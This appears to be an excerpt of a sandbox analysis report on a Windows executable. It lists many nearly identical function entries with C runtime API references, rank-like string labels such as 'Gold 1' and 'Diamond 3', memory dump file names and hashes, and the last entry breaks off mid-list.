_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Gold 1, xrefs: 00007FF68B4C268B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 1
API String ID: 3063020102-1116304436
Opcode ID: c4d1df142aba2d168b106aebbd2178e24ac5d40c98f659303f1b7d1ea7051dd7
Instruction ID: 6d7e303adac7927ad82dfa659f0a6289810c3ed5e4467ffe5ccfa9b3dfdf195f
Opcode Fuzzy Hash: c4d1df142aba2d168b106aebbd2178e24ac5d40c98f659303f1b7d1ea7051dd7
Instruction Fuzzy Hash: 0582E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C267F Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Silver 3, xrefs: 00007FF68B4C267F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 3
API String ID: 3063020102-3638036111
Opcode ID: 14a15e9a4b23784bfde5c8018b46a5709d181cf56b1179ec34f6d0abb83ebcae
Instruction ID: a43c291d3e67ed27d0c80c10f17e6a1ef904f11380e83e1d9b50769aac05201f
Opcode Fuzzy Hash: 14a15e9a4b23784bfde5c8018b46a5709d181cf56b1179ec34f6d0abb83ebcae
Instruction Fuzzy Hash: C982E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26AF Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Gold 3, xrefs: 00007FF68B4C26AF

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 3
API String ID: 3063020102-2894533912
Opcode ID: 1bfdc7d8b3af4c6d2a5a1e028570c65e662187b4933847e60e4f58ed0dbbc3ee
Instruction ID: 2b08ef1503188e2113f65c257b4571fb85073d163098916acae5442ad5ed325d
Opcode Fuzzy Hash: 1bfdc7d8b3af4c6d2a5a1e028570c65e662187b4933847e60e4f58ed0dbbc3ee
Instruction Fuzzy Hash: F782E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C269D Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Gold 2, xrefs: 00007FF68B4C269D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 2
API String ID: 3063020102-3682608526
Opcode ID: 52aca5cf23fe47dd806bd67c970345eb107ca6590d194b4c5a4228492483f948
Instruction ID: b5eedfa796be1163da25930141cb678081f96b156ff4ba62b37467f139a1584e
Opcode Fuzzy Hash: 52aca5cf23fe47dd806bd67c970345eb107ca6590d194b4c5a4228492483f948
Instruction Fuzzy Hash: 2F82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C264F Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Bronze 2, xrefs: 00007FF68B4C264F

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 2
API String ID: 3063020102-3170931529
Opcode ID: 6268dcc4aadb01be096e14f2a137f7fd786fc46b922ded0ffff73a02fc1771fb
Instruction ID: f04e3700fcd99425c6e69bb106cddda88c245243adc820ebb93c0e0a8a6d1018
Opcode Fuzzy Hash: 6268dcc4aadb01be096e14f2a137f7fd786fc46b922ded0ffff73a02fc1771fb
Instruction Fuzzy Hash: AC82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C2643 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Bronze 1, xrefs: 00007FF68B4C2643

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 1
API String ID: 3063020102-604619507
Opcode ID: 1ab3123b9978825f1b010b984fe8543613a91dee6e313c613bcbd0b1c06a16e8
Instruction ID: fefdd0c385047ed3dd336a5a00381ea5843aa75d4ce019feda83862e64220774
Opcode Fuzzy Hash: 1ab3123b9978825f1b010b984fe8543613a91dee6e313c613bcbd0b1c06a16e8
Instruction Fuzzy Hash: 5782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C2673 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Silver 2, xrefs: 00007FF68B4C2673

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 2
API String ID: 3063020102-2950641177
Opcode ID: 70dc03bb5091e3dc0444ae30c3651d8ccac21bafac33811686ee661c6c440c35
Instruction ID: 0092bf1ab1724d2f85d750da7ec4a7ad5f892d7e6abbdfc122ab5584a9601844
Opcode Fuzzy Hash: 70dc03bb5091e3dc0444ae30c3651d8ccac21bafac33811686ee661c6c440c35
Instruction Fuzzy Hash: 2B82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C2667 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Silver 1, xrefs: 00007FF68B4C2667

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 1
API String ID: 3063020102-920020899
Opcode ID: dd5a9e45530b6f9f866709f237e15754142077fe6625e20070edeaa5752db1d8
Instruction ID: 089b0def447d6d64a0a3de25a373d3d525bace8a94507698eb6b3cf8bd32f6b5
Opcode Fuzzy Hash: dd5a9e45530b6f9f866709f237e15754142077fe6625e20070edeaa5752db1d8
Instruction Fuzzy Hash: 5C82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C265B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Bronze 3, xrefs: 00007FF68B4C265B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 3
API String ID: 3063020102-3389498335
Opcode ID: 8c7902f809fc18538573d45da2e0e89bcdf39c4da26b8e49d16b09953188c13a
Instruction ID: 45fa77d0e7c4b4d388207036953654b8b627066f6a0c345eb6ddc7f8e234c0a7
Opcode Fuzzy Hash: 8c7902f809fc18538573d45da2e0e89bcdf39c4da26b8e49d16b09953188c13a
Instruction Fuzzy Hash: 6782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C270C Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Diamond 3, xrefs: 00007FF68B4C270C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 3
API String ID: 3063020102-2523521028
Opcode ID: c0f8798171c3598e572867e051071c27df97a586ba737f48579320c3c8771d70
Instruction ID: 97f89ad3bddcb1a7e275265bb1b5347f160c14c1a2708fb7eb4b2041ac12967b
Opcode Fuzzy Hash: c0f8798171c3598e572867e051071c27df97a586ba737f48579320c3c8771d70
Instruction Fuzzy Hash: 5782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26FD Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
